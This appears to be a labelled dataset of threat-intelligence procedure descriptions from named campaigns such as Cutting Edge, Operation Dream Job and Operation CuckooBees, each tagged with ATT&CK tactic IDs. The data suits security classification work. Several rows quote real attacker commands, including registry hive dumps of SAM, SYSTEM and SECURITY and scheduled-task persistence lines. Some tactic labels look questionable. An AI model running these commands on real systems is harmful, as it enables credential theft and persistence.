"During Cutting Edge, threat actors saved collected data to a tar archive.",['TA0009:Collection']
"During Cutting Edge, threat actors used Perl scripts to enable the deployment of the THINSPOOL shell script dropper and for enumerating host data.",['TA0002:Execution']
"During Cutting Edge, threat actors trojanized legitimate files in Ivanti Connect Secure appliances with malicious code.",['TA0003:Persistence']
"During Cutting Edge, threat actors used DNS to tunnel IPv4 C2 traffic.",['TA0011:Command and Control']
"During Cutting Edge, threat actors stole the running configuration and cache data from targeted Ivanti Connect Secure VPNs.",['TA0009:Collection']
"During Cutting Edge, threat actors disabled logging and modified the `compcheckresult.cgi` component to edit the Ivanti Connect Secure built-in Integrity Checker exclusion list to evade detection.",['TA0005:Defense Evasion']
"During Cutting Edge, threat actors used compromised VPN accounts for lateral movement on targeted networks.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During Cutting Edge, threat actors used a Base64-encoded Python script to write a patched version of the Ivanti Connect Secure `dsls` binary.",['TA0005:Defense Evasion']
"During Cutting Edge, threat actors exploited CVE-2023-46805 and CVE-2024-21887 in Ivanti Connect Secure VPN appliances to enable authentication bypass and command injection. A server-side request forgery vulnerability, CVE-2024-21893, was identified later and used to bypass mitigations for the initial two vulnerabilities by chaining with CVE-2024-21887.",['TA0001:Initial Access']
"During Cutting Edge, threat actors deleted `/tmp/test1.txt` on compromised Ivanti Connect Secure VPNs which was used to hold stolen configuration and cache files.",['TA0005:Defense Evasion']
"During Cutting Edge, threat actors cleared logs to remove traces of their activity and restored compromised systems to a clean state to bypass manufacturer mitigations for CVE-2023-46805 and CVE-2024-21887.",['TA0005:Defense Evasion']
"During Cutting Edge, threat actors leveraged exploits to download remote files to Ivanti Connect Secure VPNs.",['TA0011:Command and Control']
"During Cutting Edge, threat actors modified a JavaScript file on the Web SSL VPN component of Ivanti Connect Secure devices to keylog credentials.","['TA0009:Collection', 'TA0006:Credential Access']"
"During Cutting Edge, threat actors used Task Manager to dump LSASS memory from Windows devices to disk.",['TA0006:Credential Access']
"During Cutting Edge, threat actors accessed and mounted virtual hard disk backups to extract ntds.dit.",['TA0006:Credential Access']
"During Cutting Edge, threat actors used compromised and out-of-support Cyberoam VPN appliances for C2.",['TA0042:Resource Development']
"During Cutting Edge, threat actors used the Unix socket and a reverse TCP shell for C2 communications.",['TA0011:Command and Control']
"During Cutting Edge, threat actors used malicious SparkGateway plugins to inject shared objects into web process memory on compromised Ivanti Secure Connect VPNs to enable deployment of backdoors.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"During Cutting Edge, threat actors used Iodine to tunnel IPv4 traffic over DNS.",['TA0011:Command and Control']
"During Cutting Edge, threat actors used a Python reverse shell and the PySoxy SOCKS5 proxy tool.",['TA0002:Execution']
"During Cutting Edge, threat actors used RDP with compromised credentials for lateral movement.",['TA0008:Lateral Movement']
"During Cutting Edge, threat actors moved laterally using compromised credentials to connect to internal Windows systems with SMB.",['TA0008:Lateral Movement']
"During Cutting Edge, threat actors used SSH for lateral movement.",['TA0008:Lateral Movement']
"During Cutting Edge, threat actors peformed reconnaissance of victims' internal websites via proxied connections.",['TA0043:Reconnaissance']
"During Cutting Edge, threat actors used the ENUM4LINUX Perl script for discovery on Windows and Samba hosts.",['TA0007:Discovery']
"During Cutting Edge, threat actors changed timestamps of multiple files on compromised Ivanti Secure Connect VPNs to conceal malicious activity.",['TA0005:Defense Evasion']
"During Cutting Edge, threat actors leveraged tools including Interactsh to identify vulnerable targets, PySoxy to simultaneously dispatch traffic between multiple endpoints, BusyBox to enable post exploitation activities, and Kubo Injector to inject shared objects into process memory.",['TA0042:Resource Development']
"During Cutting Edge, threat actors sent a magic 48-byte sequence to enable the PITSOCK backdoor to communicate via the `/tmp/clientsDownload.sock` socket.","['TA0011:Command and Control', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
"During Cutting Edge, threat actors used the publicly available Interactsh tool to identify Ivanti Connect Secure VPNs vulnerable to CVE-2024-21893.",['TA0043:Reconnaissance']
"During Cutting Edge, threat actors modified the JavaScript loaded by the Ivanti Connect Secure login page to capture credentials entered.","['TA0009:Collection', 'TA0006:Credential Access']"
"During Cutting Edge, threat actors used multiple web shells to maintain presence on compromised Connect Secure appliances such as WIREFIRE, GLASSTOKEN, BUSHWALK, LIGHTWIRE, and FRAMESTING.",['TA0003:Persistence']
"During Frankenstein, the threat actors used Empire to automatically gather the username, domain name, machine name, and other system information.",['TA0009:Collection']
"During Frankenstein, the threat actors collected information via Empire, which was automatically sent back to the adversary's C2.",['TA0010:Exfiltration']
"During Frankenstein, the threat actors ran encoded commands from the command line.",['TA0005:Defense Evasion']
"During Frankenstein, the threat actors used Empire to gather various local system information.",['TA0009:Collection']
"During Frankenstein, the threat actors deobfuscated Base64-encoded commands following the execution of a malicious script, which revealed a small script designed to obtain an additional payload.",['TA0005:Defense Evasion']
"During Frankenstein, the threat actors collected information via Empire, which sent the data back to the adversary's C2.",['TA0010:Exfiltration']
"During Frankenstein, the threat actors exploited CVE-2017-11882 to execute code on the victim's machine.",['TA0002:Execution']
"During Frankenstein, the threat actors downloaded files and tools onto a victim machine.",['TA0011:Command and Control']
"During Frankenstein, the threat actors used MSbuild to execute an actor-created file.",['TA0005:Defense Evasion']
"During Frankenstein, the threat actors relied on a victim to enable macros within a malicious Microsoft Word document likely sent via email.",['TA0002:Execution']
"During Frankenstein, the threat actors named a malicious scheduled task ""WinUpdate"" for persistence.",['TA0005:Defense Evasion']
"During Frankenstein, the threat actors used PowerShell to run a series of Base64-encoded commands that acted as a stager and enumerated hosts.",['TA0002:Execution']
"During Frankenstein, the threat actors used Empire to obtain a list of all running processes.",['TA0007:Discovery']
"During Frankenstein, the threat actors established persistence through a scheduled task using the command: `/Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR`, named ""WinUpdate""","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During Frankenstein, the threat actors used WMI queries to determine if analysis tools were running on a compromised system.",['TA0007:Discovery']
"During Frankenstein, the threat actors likely used spearphishing emails to send malicious Microsoft Word documents.",['TA0001:Initial Access']
"During Frankenstein, the threat actors communicated with C2 via an encrypted RC4 byte stream and AES-CBC.",['TA0011:Command and Control']
"During Frankenstein, the threat actors used a script that ran WMI queries to check if a VM or sandbox was running, including VMWare and Virtualbox. The script would also call WMI to determine the number of cores allocated to the system; if less than two the script would stop execution.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
"During Frankenstein, the threat actors used Empire to obtain the compromised machine's name.",['TA0007:Discovery']
"During Frankenstein, the threat actors used Empire to find the public IP address of a compromised system.",['TA0007:Discovery']
"During Frankenstein, the threat actors used Empire to enumerate hosts and gather username, machine name, and administrative permissions information.",['TA0007:Discovery']
"During Frankenstein, the threat actors used trojanized documents that retrieved remote templates from an adversary-controlled website.",['TA0005:Defense Evasion']
"For Frankenstein, the threat actors obtained and used Empire.",['TA0042:Resource Development']
"During Frankenstein, the threat actors used Word documents that prompted the victim to enable macros and run a Visual Basic script.",['TA0002:Execution']
"During Frankenstein, the threat actors used HTTP GET requests for C2.",['TA0011:Command and Control']
"During Frankenstein, the threat actors ran a command script to set up persistence as a scheduled task named ""WinUpdate"", as well as other encoded commands from the command-line",['TA0002:Execution']
"During Frankenstein, the threat actors used WMI queries to check if various security applications were running as well as to determine the operating system version.",['TA0002:Execution']
"During FunnyDream, the threat actors used 7zr.exe to add collected files to an archive.",['TA0009:Collection']
"For FunnyDream, the threat actors registered a variety of domains.",['TA0042:Resource Development']
"For FunnyDream, the threat actors likely established an identified email account to register a variety of domains that were used during the campaign.",['TA0042:Resource Development']
"During FunnyDream, the threat actors downloaded additional droppers and backdoors onto a compromised system.",['TA0011:Command and Control']
"For FunnyDream, the threat actors used a new backdoor named FunnyDream.",['TA0042:Resource Development']
"During FunnyDream, the threat actors used Tasklist on targeted systems.",['TA0007:Discovery']
"During FunnyDream, the threat actors used several tools and batch files to map victims' internal networks.",['TA0007:Discovery']
"During FunnyDream, the threat actors used Systeminfo to collect information on targeted hosts.",['TA0007:Discovery']
"During FunnyDream, the threat actors used ipconfig for discovery on remote systems.",['TA0007:Discovery']
"During FunnyDream, the threat actors used netstat to discover network connections on remote systems.",['TA0007:Discovery']
"For FunnyDream, the threat actors used a modified version of the open source PcShare remote administration tool.",['TA0042:Resource Development']
"During FunnyDream, the threat actors used a Visual Basic script to run remote commands.",['TA0002:Execution']
"During FunnyDream, the threat actors used `cmd.exe` to execute the wmiexec.vbs script.",['TA0002:Execution']
"During FunnyDream, the threat actors used `wmiexec.vbs` to run remote commands.",['TA0002:Execution']
"During HomeLand Justice, threat actors added the `ApplicationImpersonation` management role to accounts under their control to impersonate users and take ownership of targeted mailboxes.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During HomeLand Justice, threat actors used tools with legitimate code signing certificates.",['TA0042:Resource Development']
"During HomeLand Justice, threat actors used ROADSWEEP ransomware to encrypt files on targeted systems.",['TA0040:Impact']
"During HomeLand Justice, threat actors used the built-in administrator account to move laterally using RDP and Impacket.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During HomeLand Justice, threat actors deleted Windows events and application logs.",['TA0005:Defense Evasion']
"During HomeLand Justice, threat actors modified and disabled components of endpoint detection and response solutions including Microsoft Defender Antivirus.",['TA0005:Defense Evasion']
"During HomeLand Justice, threat actors used a version of ZeroCleare to wipe disk drives on targeted hosts.",['TA0040:Impact']
"During HomeLand Justice, threat actors used compromised Exchange accounts to search mailboxes for administrator accounts.",['TA0007:Discovery']
"During HomeLand Justice, threat actors used HTTP to transfer data from compromised Exchange servers.",['TA0010:Exfiltration']
"For HomeLand Justice, threat actors exploited CVE-2019-0604 in Microsoft SharePoint for initial access.",['TA0001:Initial Access']
"During HomeLand Justice, threat actors used web shells to download files to compromised infrastructure.",['TA0011:Command and Control']
"During HomeLand Justice, threat actors dumped LSASS memory on compromised hosts.",['TA0006:Credential Access']
"During HomeLand Justice, threat actors initiated a process named Mellona.exe to spread the ROADSWEEP file encryptor and a persistence script to a list of internal machines.",['TA0008:Lateral Movement']
"During HomeLand Justice, threat actors renamed ROADSWEEP to GoXML.exe and ZeroCleare to cl.exe.",['TA0005:Defense Evasion']
"During HomeLand Justice, threat actors executed the Advanced Port Scanner tool on compromised systems.",['TA0007:Discovery']
"During HomeLand Justice, threat actors used PowerShell cmdlets New-MailboxSearch and Get-Recipient for discovery.",['TA0002:Execution']
"During HomeLand Justice, threat actors primarily used RDP for lateral movement in the victim environment.",['TA0008:Lateral Movement']
"During HomeLand Justice, threat actors made multiple HTTP POST requests to the Exchange servers of the victim organization to transfer data.",['TA0009:Collection']
"During HomeLand Justice, threat actors used SMB for lateral movement.",['TA0008:Lateral Movement']
"During HomeLand Justice, threat actors used custom tooling to acquire tokens using `ImpersonateLoggedOnUser/SetThreadToken`.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"During HomeLand Justice, threat actors used tools including Advanced Port Scanner, Mimikatz, and Impacket.",['TA0042:Resource Development']
"During HomeLand Justice, threat actors used a compromised Exchange account to search mailboxes and create new Exchange accounts.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"For HomeLand Justice, threat actors used .aspx webshells named pickers.aspx, error4.aspx, and ClientBin.aspx, to maintain persistence.",['TA0003:Persistence']
"During HomeLand Justice, threat actors used Windows batch files for persistence and execution.",['TA0002:Execution']
"During HomeLand Justice, threat actors used WMI to modify Windows Defender settings.",['TA0002:Execution']
"KV Botnet Activity used various scripts to remove or disable security tools, such as http_watchdog and firewallsd, as well as tools related to other botnet infections, such as mips_ff, on victim devices.",['TA0005:Defense Evasion']
"KV Botnet Activity command and control activity includes transmission of an RSA public key in communication from the server, but this is followed by subsequent negotiation stages that represent a form of handshake similar to TLS negotiation.",['TA0011:Command and Control']
"KV Botnet Activity involves managing events on victim systems via libevent to execute a callback function when any running process contains the following references in their path without also having a reference to bioset: busybox, wget, curl, tftp, telnetd, or lua. If the bioset string is not found, the related process is terminated.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
KV Botnet Activity removes on-disk copies of tools and other artifacts after it the primary botnet payload has been loaded into memory on the victim device.,['TA0005:Defense Evasion']
"KV Botnet Activity gathers a list of filenames from the following locations during execution of the final botnet stage: \/usr\/sbin\/, \/usr\/bin\/, \/sbin\/, \/pfrm2.0\/bin\/, \/usr\/local\/bin\/.",['TA0007:Discovery']
KV Botnet Activity included the use of scripts to download additional payloads when compromising network nodes.,['TA0011:Command and Control']
KV Botnet Activity altered permissions on downloaded tools and payloads to enable execution on victim machines.,['TA0005:Defense Evasion']
"KV Botnet Activity installation steps include first identifying, then stopping, any process containing kworker\/0:1, then renaming its initial installation stage to this process name.",['TA0005:Defense Evasion']
KV Botnet Activity involves changing process filename to pr_set_mm_exe_file and process name to pr_set_name during later infection stages.,['TA0005:Defense Evasion']
KV Botnet Activity focuses on compromise of small office-home office network devices to build the subsequent botnet.,['TA0042:Resource Development']
"KV Botnet Activity command and control traffic uses a non-standard, likely custom protocol for communication.",['TA0011:Command and Control']
"KV Botnet Activity generates a random port number greater than 30,000 to serve as the listener for subsequent command and control activity.",['TA0011:Command and Control']
KV Botnet Activity final payload installation includes mounting and binding to the \/proc\/ filepath on the victim system to enable subsequent operation in memory while also removing on-disk artifacts.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Scripts associated with KV Botnet Activity initial deployment can identify processes related to security tools and other botnet families for follow-on disabling during installation.,['TA0007:Discovery']
"KV Botnet Activity involved removal of security tools, as well as other identified IOT malware, from compromised devices.",['TA0007:Discovery']
"KV Botnet Activity includes use of native system tools, such as uname, to obtain information about victim device architecture, as well as gathering other system information such as the victim's hosts file and CPU utilization.",['TA0007:Discovery']
KV Botnet Activity gathers victim IP information during initial installation stages.,['TA0007:Discovery']
"KV Botnet Activity utilizes multiple Bash scripts during botnet installation stages, and the final botnet payload allows for running commands in the Bash shell.",['TA0002:Execution']
KV Botnet Activity used acquired Virtual Private Servers as control systems for devices infected with KV Botnet malware.,['TA0042:Resource Development']
"During Night Dragon, the threat actors collected files and other data from compromised systems.",['TA0009:Collection']
"During Night Dragon, threat actors disabled anti-virus and anti-spyware tools in some instances on the victim’s machines. The actors also disabled proxy settings to allow direct communication from victims to the Internet.",['TA0005:Defense Evasion']
"During Night Dragon, threat actors used domain accounts to gain further access to victim systems.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During Night Dragon, threat actors used dynamic DNS services for C2.",['TA0011:Command and Control']
"During Night Dragon, threat actors used a DLL that included an XOR-encoded section.",['TA0005:Defense Evasion']
"During Night Dragon, threat actors used SQL injection exploits against extranet web servers to gain access.",['TA0001:Initial Access']
"During Night Dragon, threat actors used compromised VPN accounts to gain access to victim systems.","['TA0001:Initial Access', 'TA0003:Persistence']"
"During Night Dragon, threat actors used company extranet servers as secondary C2 servers.",['TA0011:Command and Control']
"During Night Dragon, threat actors used zwShell to establish full remote control of the connected machine and browse the victim file system.",['TA0007:Discovery']
"During Night Dragon, threat actors used administrative utilities to deliver Trojan components to remote systems.",['TA0011:Command and Control']
"During Night Dragon, threat actors used RAT malware to exfiltrate email archives.",['TA0009:Collection']
"During Night Dragon, threat actors enticed users to click on links in spearphishing emails to download malware.",['TA0002:Execution']
"During Night Dragon, threat actors used Trojans from underground hacker websites.",['TA0042:Resource Development']
"During Night Dragon, threat actors used zwShell to establish full remote control of the connected machine and manipulate the Registry.",['TA0005:Defense Evasion']
"During Night Dragon, threat actors used pass-the-hash tools to obtain authenticated access to sensitive internal desktops and servers.","['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
"During Night Dragon, threat actors used Cain & Abel to crack password hashes.",['TA0006:Credential Access']
"During Night Dragon, threat actors used several remote administration tools as persistent infiltration channels.",['TA0011:Command and Control']
"During Night Dragon, threat actors copied files to company web servers and subsequently downloaded them.",['TA0009:Collection']
"During Night Dragon, threat actors dumped account hashes using gsecdump.",['TA0006:Credential Access']
"During Night Dragon, threat actors purchased hosted services to use for C2.",['TA0042:Resource Development']
"During Night Dragon, threat actors compromised web servers to use for C2.",['TA0042:Resource Development']
"During Night Dragon, threat actors used software packing in its tools.",['TA0005:Defense Evasion']
"During Night Dragon, threat actors sent spearphishing emails containing links to compromised websites where malware was downloaded.",['TA0001:Initial Access']
"During Night Dragon, threat actors used password cracking and pass-the-hash tools to discover usernames and passwords.",['TA0007:Discovery']
"During Night Dragon, threat actors obtained and used tools such as gsecdump.",['TA0042:Resource Development']
"During Night Dragon, threat actors uploaded commonly available hacker tools to compromised web servers.",['TA0042:Resource Development']
"During Night Dragon, threat actors used compromised VPN accounts to gain access to victim systems.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During Night Dragon, threat actors used HTTP for C2.",['TA0011:Command and Control']
"During Night Dragon, threat actors used zwShell to establish full remote control of the connected machine and run command-line shells.",['TA0002:Execution']
"During Operation CuckooBees, the threat actors used the Makecab utility to compress and a version of WinRAR to create password-protected archives of stolen data prior to exfiltration.",['TA0009:Collection']
"During Operation CuckooBees, the threat actors executed an encoded VBScript file.",['TA0005:Defense Evasion']
"During Operation CuckooBees, the threat actors used the legitimate Windows services `IKEEXT` and `PrintNotify` to side-load malicious DLLs.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During Operation CuckooBees, the threat actors collected data, files, and other information from compromised networks.",['TA0009:Collection']
"During Operation CuckooBees, the threat actors used the `dsquery` and `dsget` commands to get domain environment information and to query users in administrative groups.",['TA0007:Discovery']
"During Operation CuckooBees, the threat actors used compromised domain administrator credentials as part of their lateral movement.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During Operation CuckooBees, the threat actors exploited multiple vulnerabilities in externally facing servers.",['TA0001:Initial Access']
"During Operation CuckooBees, the threat actors enabled WinRM over HTTP/HTTPS as a backup persistence mechanism using the following command: `cscript //nologo ""C:\Windows\System32\winrm.vbs"" set winrm/config/service@{EnableCompatibilityHttpsListener=""true""}`.","['TA0001:Initial Access', 'TA0003:Persistence']"
"During Operation CuckooBees, the threat actors used `dir c:\\` to search for files.",['TA0007:Discovery']
"During Operation CuckooBees, the threat actors stroed payloads in Windows CLFS transactional logs.",['TA0005:Defense Evasion']
"During Operation CuckooBees, attackers used a signed kernel rootkit to establish additional persistence.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During Operation CuckooBees, the threat actors used the `net user` command to gather account information.",['TA0007:Discovery']
"During Operation CuckooBees, the threat actors used the `net group` command as part of their advanced reconnaissance.",['TA0007:Discovery']
"During Operation CuckooBees, the threat actors renamed a malicious executable to `rundll32.exe` to allow it to blend in with other Windows system files.",['TA0005:Defense Evasion']
"During Operation CuckooBees, the threat actors used the `net share` command as part of their advanced reconnaissance.",['TA0007:Discovery']
"During Operation CuckooBees, the threat actors used the `net accounts` command as part of their advanced reconnaissance.",['TA0007:Discovery']
"During Operation CuckooBees, the threat actors used the `fsutil fsinfo drives` command as part of their advanced reconnaissance.",['TA0007:Discovery']
"During Operation CuckooBees, the threat actors used the `tasklist` command as part of their advanced reconnaissance.",['TA0007:Discovery']
"During Operation CuckooBees, the threat actors used the `net view` and `ping` commands as part of their advanced reconnaissance.",['TA0007:Discovery']
"During Operation CuckooBees, the threat actors used scheduled tasks to execute batch scripts for lateral movement with the following command: `SCHTASKS /Create /S /U /p /SC ONCE /TN test /TR /ST /RU SYSTEM.`","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During Operation CuckooBees, the threat actors leveraged a custom tool to dump OS credentials and used following commands: `reg save HKLM\\SYSTEM system.hiv`, `reg save HKLM\\SAM sam.hiv`, and `reg save HKLM\\SECURITY security.hiv`, to dump SAM, SYSTEM and SECURITY hives.",['TA0006:Credential Access']
"During Operation CuckooBees, the threat actors used the `systeminfo` command to gather details about a compromised system.",['TA0007:Discovery']
"During Operation CuckooBees, the threat actors used `ipconfig`, `nbtstat`, `tracert`, `route print`, and `cat /etc/hosts` commands.",['TA0007:Discovery']
"During Operation CuckooBees, the threat actors used the `net session`, `net use`, and `netstat` commands as part of their advanced reconnaissance.",['TA0007:Discovery']
"During Operation CuckooBees, the threat actors used the `query user` and `whoami` commands as part of their advanced reconnaissance.",['TA0007:Discovery']
"During Operation CuckooBees, the threat actors used the `net start` command as part of their initial reconnaissance.",['TA0007:Discovery']
"During Operation CuckooBees, the threat actors used the `net time` command as part of their advanced reconnaissance.",['TA0007:Discovery']
"For Operation CuckooBees, the threat actors obtained publicly-available JSP code that was used to deploy a webshell onto a compromised server.",['TA0042:Resource Development']
"During Operation CuckooBees, the threat actors executed an encoded VBScript file using `wscript` and wrote the decoded output to a text file.",['TA0002:Execution']
"During Operation CuckooBees, the threat actors enabled HTTP and HTTPS listeners.",['TA0011:Command and Control']
"During Operation CuckooBees, the threat actors generated a web shell within a vulnerable Enterprise Resource Planning Web Application Server as a persistence mechanism.",['TA0003:Persistence']
"During Operation CuckooBees, the threat actors used batch scripts to perform reconnaissance.",['TA0002:Execution']
"During Operation CuckooBees, the threat actors modified the `IKEEXT` and `PrintNotify` Windows services for persistence.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During Operation Dream Job, Lazarus Group archived victim's data into a RAR file.",['TA0009:Collection']
"During Operation Dream Job, Lazarus Group performed brute force attacks against administrator accounts.",['TA0006:Credential Access']
"During Operation Dream Job, Lazarus Group digitally signed their own malware to evade detection.",['TA0005:Defense Evasion']
"During Operation Dream Job, Lazarus Group digitally signed their malware and the dbxcli utility.",['TA0042:Resource Development']
"During Operation Dream Job, Lazarus Group used code signing certificates issued by Sectigo RSA for some of its malware and tools.",['TA0042:Resource Development']
"During Operation Dream Job, Lazarus Group used malicious Trojans and DLL files to exfiltrate data from an infected host.",['TA0009:Collection']
"During Operation Dream Job, Lazarus Group used tools that used the `IsDebuggerPresent` call to detect debuggers.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
"During Operation Dream Job, Lazarus Group queried compromised victim's active directory servers to obtain the list of employees including administrator accounts.",['TA0007:Discovery']
"During Operation Dream Job, Lazarus Group registered a domain name identical to that of a compromised company as part of their BEC effort.",['TA0042:Resource Development']
"For Operation Dream Job, Lazarus Group compromised domains in Italy and other countries for their C2 infrastructure.",['TA0042:Resource Development']
"During Operation Dream Job, Lazarus Group created fake email accounts to correspond with fake LinkedIn personas; Lazarus Group also established email accounts to match those of the victim as part of their BEC attempt.",['TA0042:Resource Development']
"During Operation Dream Job, Lazarus Group encrypted malware such as DRATzarus with XOR and DLL files with base64.",['TA0005:Defense Evasion']
"During Operation Dream Job, Lazarus Group exfiltrated data from a compromised host to actor-controlled C2 servers.",['TA0010:Exfiltration']
"During Operation Dream Job, Lazarus Group used a custom build of open-source command-line dbxcli to exfiltrate stolen data to Dropbox.",['TA0010:Exfiltration']
"During Operation Dream Job, Lazarus Group removed all previously delivered files from a compromised computer.",['TA0005:Defense Evasion']
"During Operation Dream Job, Lazarus Group conducted word searches within documents on a compromised host in search of security and financial matters.",['TA0007:Discovery']
"For Operation Dream Job, Lazarus Group conducted extensive reconnaissance research on potential targets.",['TA0043:Reconnaissance']
"For Operation Dream Job, Lazarus Group gathered victim organization information to identify specific targets.",['TA0043:Reconnaissance']
"During Operation Dream Job, Lazarus Group targeted Windows servers running Internet Information Systems to install C2 components.",['TA0003:Persistence']
"During Operation Dream Job, Lazarus Group targeted specific individuals within an organization with tailored job vacancy announcements.",['TA0043:Reconnaissance']
"During Operation Dream Job, Lazarus Group impersonated HR hiring personnel through LinkedIn messages and conducted interviews with victims in order to deceive them into downloading malware.",['TA0005:Defense Evasion']
"During Operation Dream Job, Lazarus Group downloaded multistage malware and tools onto a compromised host.",['TA0011:Command and Control']
"During Operation Dream Job, Lazarus Group conducted internal spearphishing from within a compromised organization.",['TA0008:Lateral Movement']
"During Operation Dream Job, Lazarus Group lured victims into executing malicious documents that contained ""dream job"" descriptions from defense, aerospace, and other sectors.",['TA0002:Execution']
"During Operation Dream Job, Lazarus Group lured users into executing a malicious link to disclose private account information or provide initial access.",['TA0002:Execution']
"For Operation Dream Job, Lazarus Group developed custom tools such as Sumarta, DBLL Dropper, Torisma, and DRATzarus for their operations.",['TA0042:Resource Development']
"During Operation Dream Job, Lazarus Group disguised malicious template files as JPEG files to avoid detection.",['TA0005:Defense Evasion']
"During Operation Dream Job, Lazarus Group used Windows API `ObtainUserAgentString` to obtain the victim's User-Agent and used the value to connect to their C2 server.",['TA0002:Execution']
"During Operation Dream Job, Lazarus Group used PowerShell commands to explore the environment of compromised victims.",['TA0002:Execution']
"During Operation Dream Job, Lazarus Group placed LNK files into the victims' startup folder for persistence.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During Operation Dream Job, Lazarus Group used `regsvr32` to execute malware.",['TA0005:Defense Evasion']
"During Operation Dream Job, Lazarus Group executed malware with `C:\\windows\system32\rundll32.exe ""C:\ProgramData\ThumbNail\thumbnail.db""`, `CtrlPanel S-6-81-3811-75432205-060098-6872 0 0 905`.",['TA0005:Defense Evasion']
"During Operation Dream Job, Lazarus Group created scheduled tasks to set a periodic execution of a remote XSL script.","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During Operation Dream Job, Lazarus Group acquired servers to host their malicious tools.",['TA0042:Resource Development']
"For Operation Dream Job, Lazarus Group compromised servers to host their malicious tools.",['TA0042:Resource Development']
"For Operation Dream Job, Lazarus Group used LinkedIn to identify and target employees within a chosen organization.",['TA0043:Reconnaissance']
"For Operation Dream Job, Lazarus Group created fake LinkedIn accounts for their targeting efforts.",['TA0042:Resource Development']
"During Operation Dream Job, Lazarus Group packed malicious .db files with Themida to evade detection.",['TA0005:Defense Evasion']
"During Operation Dream Job, Lazarus Group sent emails with malicious attachments to gain unauthorized access to targets' computers.",['TA0001:Initial Access']
"During Operation Dream Job, Lazarus Group sent malicious OneDrive links with fictitious job offer advertisements via email.",['TA0001:Initial Access']
"During Operation Dream Job, Lazarus Group sent victims spearphishing messages via LinkedIn concerning fictitious jobs.",['TA0001:Initial Access']
"During Operation Dream Job, Lazarus Group used an AES key to communicate with their C2 server.",['TA0011:Command and Control']
"During Operation Dream Job, Lazarus Group used tools that conducted a variety of system checks to detect sandboxes or VMware services.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
"During Operation Dream Job, Lazarus Group deployed malware designed not to run on computers set to Korean, Japanese, or Chinese in Windows language preferences.",['TA0007:Discovery']
"During Operation Dream Job, Lazarus Group used DOCX files to retrieve a malicious document template/DOTM file.",['TA0005:Defense Evasion']
"During Operation Dream Job, Lazarus Group used tools that collected `GetTickCount` and `GetSystemTimeAsFileTime` data to detect sandbox or VMware services.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
"For Operation Dream Job, Lazarus Group obtained tools such as Wake-On-Lan, Responder, ChromePass, and dbxcli.",['TA0042:Resource Development']
"For Operation Dream Job, Lazarus Group used compromised servers to host malware.",['TA0042:Resource Development']
"For Operation Dream Job, Lazarus Group used multiple servers to host malicious tools.",['TA0042:Resource Development']
"During Operation Dream Job, Lazarus Group executed a VBA written malicious macro after victims download malicious DOTM files; Lazarus Group also used Visual Basic macro code to extract a double Base64 encoded DLL implant.",['TA0002:Execution']
"During Operation Dream Job, Lazarus Group uses HTTP and HTTPS to contact actor-controlled C2 servers.",['TA0011:Command and Control']
"During Operation Dream Job, Lazarus Group used file hosting services like DropBox and OneDrive.",['TA0042:Resource Development']
"During Operation Dream Job, Lazarus Group launched malicious DLL files, created new folders, and renamed folders with the use of the Windows command shell.",['TA0002:Execution']
"During Operation Dream Job, Lazarus Group used WMIC to executed a remote XSL script.",['TA0002:Execution']
"During Operation Dream Job, Lazarus Group used a remote XSL script to download a Base64-encoded DLL custom downloader.",['TA0005:Defense Evasion']
"During Operation Dust Storm, attackers used VBS code to decode payloads.",['TA0005:Defense Evasion']
"For Operation Dust Storm, the threat actors established domains as part of their operational infrastructure.",['TA0042:Resource Development']
"During Operation Dust Storm, the threat actors used a watering hole attack on a popular software reseller to exploit the then-zero-day Internet Explorer vulnerability CVE-2014-0322.",['TA0001:Initial Access']
"For Operation Dust Storm, the threat actors used dynamic DNS domains from a variety of free providers, including No-IP, Oray, and 3322.",['TA0011:Command and Control']
"For Operation Dust Storm, the threat actors established email addresses to register domains for their operations.",['TA0042:Resource Development']
"During Operation Dust Storm, the threat actors encoded some payloads with a single-byte XOR, both skipping the key itself and zeroing in an attempt to avoid exposing the key; other payloads were Base64-encoded.",['TA0005:Defense Evasion']
"During Operation Dust Storm, the threat actors exploited Adobe Flash vulnerability CVE-2011-0611, Microsoft Windows Help vulnerability CVE-2010-1885, and several Internet Explorer vulnerabilities, including CVE-2011-1255, CVE-2012-1889, and CVE-2014-0322.",['TA0002:Execution']
"During Operation Dust Storm, the threat actors used JavaScript code.",['TA0002:Execution']
"During Operation Dust Storm, the threat actors relied on potential victims to open a malicious Microsoft Word document sent via email.",['TA0002:Execution']
"During Operation Dust Storm, the threat actors relied on a victim clicking on a malicious link sent via email.",['TA0002:Execution']
"For Operation Dust Storm, the threat actors disguised some executables as JPG files.",['TA0005:Defense Evasion']
"During Operation Dust Storm, the threat actors executed JavaScript code via `mshta.exe`.",['TA0005:Defense Evasion']
"During Operation Dust Storm, the threat actors deployed a file called `DeployJava.js` to fingerprint installed software on a victim system prior to exploit delivery.",['TA0007:Discovery']
